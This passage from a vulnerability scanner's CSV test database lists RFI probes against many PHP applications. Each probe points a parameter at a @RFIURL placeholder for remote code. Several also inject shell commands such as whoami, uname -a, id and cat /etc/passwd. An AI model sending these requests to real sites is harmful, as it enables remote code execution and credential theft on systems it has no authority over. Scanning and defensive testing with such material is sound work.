(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005950\",\"5292\",\"c\",\"/templates/default/index_logged.php?main_loaded=1&cur_module=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005951\",\"5292\",\"c\",\"/templates/default/tpl_message.php?right_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005952\",\"5292\",\"c\",\"/templates/footer.inc.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005953\",\"5292\",\"c\",\"/templates/header.inc.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005954\",\"5292\",\"c\",\"/templates/mylook/template.tpl.php?renderer=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005955\",\"5292\",\"c\",\"/templates/oerdec/template.tpl.php?renderer=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005956\",\"5292\",\"c\",\"/templates/pb/language/lang_nl.php?temppath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005957\",\"5292\",\"c\",\"/templates/penguin/template.tpl.php?renderer=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005958\",\"5292\",\"c\",\"/templates/sidebar/template.tpl.php?renderer=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005959\",\"5292\",\"c\",\"/templates/slashdot/template.tpl.php?renderer=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005960\",\"5292\",\"c\",\"/templates/stylesheets.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005961\",\"5292\",\"c\",\"/templates/text-only/template.tpl.php?renderer=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005962\",\"5292\",\"c\",\"/templates/tmpl_dfl/scripts/index.php?dir[inc]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005963\",\"5292\",\"c\",\"/theme/breadcrumb.php?rootBase=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005964\",\"5292\",\"c\",\"/theme/default.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005965\",\"5292\",\"c\",\"/theme/format.php?_page_content=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005966\",\"5292\",\"c\",\"/theme/format.php?_page_css=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005967\",\"5292\",\"c\",\"/theme/frames1.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005968\",\"5292\",\"c\",\"/theme/frames1_center.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005969\",\"5292\",\"c\",\"/theme/frames1_left.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005970\",\"5292\",\"c\",\"/theme/frames1_top.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005971\",\"5292\",\"c\",\"/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005972\",\"5292\",\"c\",\"/theme/settings.php?pfad_z=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005973\",\"5292\",\"c\",\"/theme/test1.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005974\",\"5292\",\"c\",\"/theme/test2.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005975\",\"5292\",\"c\",\"/theme/test3.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005976\",\"5292\",\"c\",\"/theme/test4.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005977\",\"5292\",\"c\",\"/theme/test5.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005978\",\"5292\",\"c\",\"/theme/test6.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005979\",\"5292\",\"c\",\"/themes.php?GLOBALS[theme_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005980\",\"5292\",\"c\",\"/themes/blackorange.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005981\",\"5292\",\"c\",\"/themes/container.php?theme_directory=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005982\",\"5292\",\"c\",\"/themes/default/layouts/standard.php?page_include=@RFIURL?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005983\",\"5292\",\"c\",\"/themes/default/preview_post_completo.php?dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005984\",\"5292\",\"c\",\"/themes/header.php?theme_directory=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005985\",\"5292\",\"c\",\"/themes/ubb/login.php?theme=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005986\",\"5292\",\"c\",\"/themes/ubb/login.php?theme=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005987\",\"5292\",\"c\",\"/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005988\",\"40478\",\"c\",\"/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"TikiWiki contains a vulnerability which allows remote attackers to execute arbitrary PHP code.\",\"\",\"\"\n\"005989\",\"5292\",\"c\",\"/timedifference.php?la=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005990\",\"5292\",\"c\",\"/toolbar.loudmouth.php?mainframe=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005991\",\"5292\",\"c\",\"/tools/update_translations.php?_SESSION[path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005992\",\"5292\",\"c\",\"/top.php?laypath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005993\",\"5292\",\"c\",\"/toplist.php?f=toplist_top10&phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005994\",\"5292\",\"c\",\"/topsites/index.php?page=@RFIURL?&cmd=uname -a\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005995\",\"5292\",\"c\",\"/towels-0.1/src/scripture.php?pageHeaderFile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005996\",\"5292\",\"c\",\"/track.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005997\",\"5292\",\"c\",\"/tsep/include/colorswitch.php?tsep_config[absPath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005998\",\"5292\",\"c\",\"/tsep/include/colorswitch.php?tsep_config[absPath]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005999\",\"5292\",\"c\",\"/ttCMS_path/lib/db/ez_sql.php?lib_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006000\",\"5292\",\"c\",\"/twebs/modules/misc/usermods.php?ROOT=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006001\",\"5292\",\"c\",\"/ubbt.inc.php?GLOBALS[thispath]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006002\",\"5292\",\"c\",\"/unavailable.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006003\",\"5292\",\"c\",\"/unsubs.php?scdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006004\",\"5292\",\"c\",\"/up.php?my[root]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006005\",\"5292\",\"c\",\"/upload.php?save_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006006\",\"5292\",\"c\",\"/upload/admin/frontpage_right.php?loadadminpage=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006007\",\"5292\",\"c\",\"/upload/top.php?maindir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006008\",\"5292\",\"c\",\"/upload/xax/admin/modules/install_module.php?level=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006009\",\"5292\",\"c\",\"/upload/xax/admin/patch/index.php?level=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006010\",\"5292\",\"c\",\"/upload/xax/ossigeno/admin/install_module.php?level=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006011\",\"5292\",\"c\",\"/upload/xax/ossigeno/admin/uninstall_module.php?level=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006012\",\"5292\",\"c\",\"/upload_local.php?target=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006013\",\"5292\",\"c\",\"/upload_multi.php?target=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006014\",\"5292\",\"c\",\"/urlinn_includes/config.php?dir_ws=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006015\",\"5292\",\"c\",\"/user.php?caselist[bad_file.txt][path]=@RFIURL&command=cat%20/etc/passwd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006016\",\"5292\",\"c\",\"/user_language.php?INDM=r3d.w0rm&language_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006017\",\"5292\",\"c\",\"/user_new_2.php?home=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006018\",\"5292\",\"c\",\"/usr/extensions/get_calendar.inc.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006019\",\"5292\",\"c\",\"/usr/extensions/get_infochannel.inc.php?root_path=@RFIURL?cmd=id;pwd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006020\",\"5292\",\"c\",\"/usr/extensions/get_tree.inc.php?GLOBALS[\\\"root_path\\\"]=@RFIURL?cmd=id;pwd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006021\",\"5292\",\"c\",\"/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006022\",\"5292\",\"c\",\"/utilitaires/gestion_sondage.php?repertoire_visiteur=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006023\",\"5292\",\"c\",\"/utilitaires/gestion_sondage.php?repertoire_visiteur=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006024\",\"5292\",\"c\",\"/utils/class_HTTPRetriever.php?libcurlemuinc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006025\",\"5292\",\"c\",\"/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006026\",\"5292\",\"c\",\"/vCard/admin/define.inc.php?match=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006027\",\"5292\",\"c\",\"/vb/includes/functions.php?classfile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006028\",\"5292\",\"c\",\"/vb/includes/functions_cron.php?nextitem=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006029\",\"5292\",\"c\",\"/vb/includes/functions_forumdisplay.php?specialtemplates=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006030\",\"5292\",\"c\",\"/vbgsitemap/vbgsitemap-config.php?base=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006031\",\"5292\",\"c\",\"/vbgsitemap/vbgsitemap-vbseo.php?base=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006032\",\"5292\",\"c\",\"/vedit/editor/edit_htmlarea.php?highlighter=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006033\",\"5292\",\"c\",\"/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006034\",\"5292\",\"c\",\"/view.php?ariadne=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006035\",\"5292\",\"c\",\"/view.php?id=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006036\",\"5292\",\"c\",\"/view_func.php?i=@RFIURL&l=testfile.txt?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006037\",\"5292\",\"c\",\"/views/print/printbar.php?views_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006038\",\"5292\",\"c\",\"/visible_count_inc.php?statitpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006039\",\"5292\",\"c\",\"/visitor.php?_SERVER[DOCUMENT_ROOT]=@RFIURL??\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006040\",\"5292\",\"c\",\"/volume.php?config[public_dir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006041\",\"5292\",\"c\",\"/vote.php?Madoa=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006042\",\"5292\",\"c\",\"/votebox.php?VoteBoxPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006043\",\"5292\",\"c\",\"/vp/configure.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006044\",\"5292\",\"c\",\"/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006045\",\"5292\",\"c\",\"/w-agora_path/add_user.php?bn_dir_default=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006046\",\"5292\",\"c\",\"/w-agora_path/create_forum.php?bn_dir_default=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006047\",\"5292\",\"c\",\"/w-agora_path/create_user.php?bn_dir_default=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006048\",\"5292\",\"c\",\"/w-agora_path/delete_notes.php?bn_dir_default=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006049\",\"5292\",\"c\",\"/w-agora_path/delete_user.php?bn_dir_default=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006050\",\"5292\",\"c\",\"/w-agora_path/edit_forum.php?bn_dir_default=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006051\",\"5292\",\"c\",\"/w-agora_path/mail_users.php?bn_dir_default=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006052\",\"5292\",\"c\",\"/w-agora_path/moderate_notes.php?bn_dir_default=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006053\",\"5292\",\"c\",\"/w-agora_path/reorder_forums.php?bn_dir_default=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006054\",\"5292\",\"c\",\"/wamp_dir/setup/yesno.phtml?no_url=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006055\",\"5292\",\"c\",\"/wapchat/src/eng.adCreate.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006056\",\"5292\",\"c\",\"/wapchat/src/eng.adCreateSave.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006057\",\"5292\",\"c\",\"/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006058\",\"5292\",\"c\",\"/wapchat/src/eng.createRoom.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006059\",\"5292\",\"c\",\"/wapchat/src/eng.forward.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006060\",\"5292\",\"c\",\"/wapchat/src/eng.pageLogout.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006061\",\"5292\",\"c\",\"/wapchat/src/eng.resultMember.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006062\",\"5292\",\"c\",\"/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006063\",\"5292\",\"c\",\"/wapchat/src/eng.saveNewRoom.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006064\",\"5292\",\"c\",\"/wapchat/src/eng.searchMember.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006065\",\"5292\",\"c\",\"/wapchat/src/eng.writeMsg.php?sysFileDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006066\",\"5292\",\"c\",\"/war.php?vwar_root=@RFIURL\",\"GET\",\"PHP 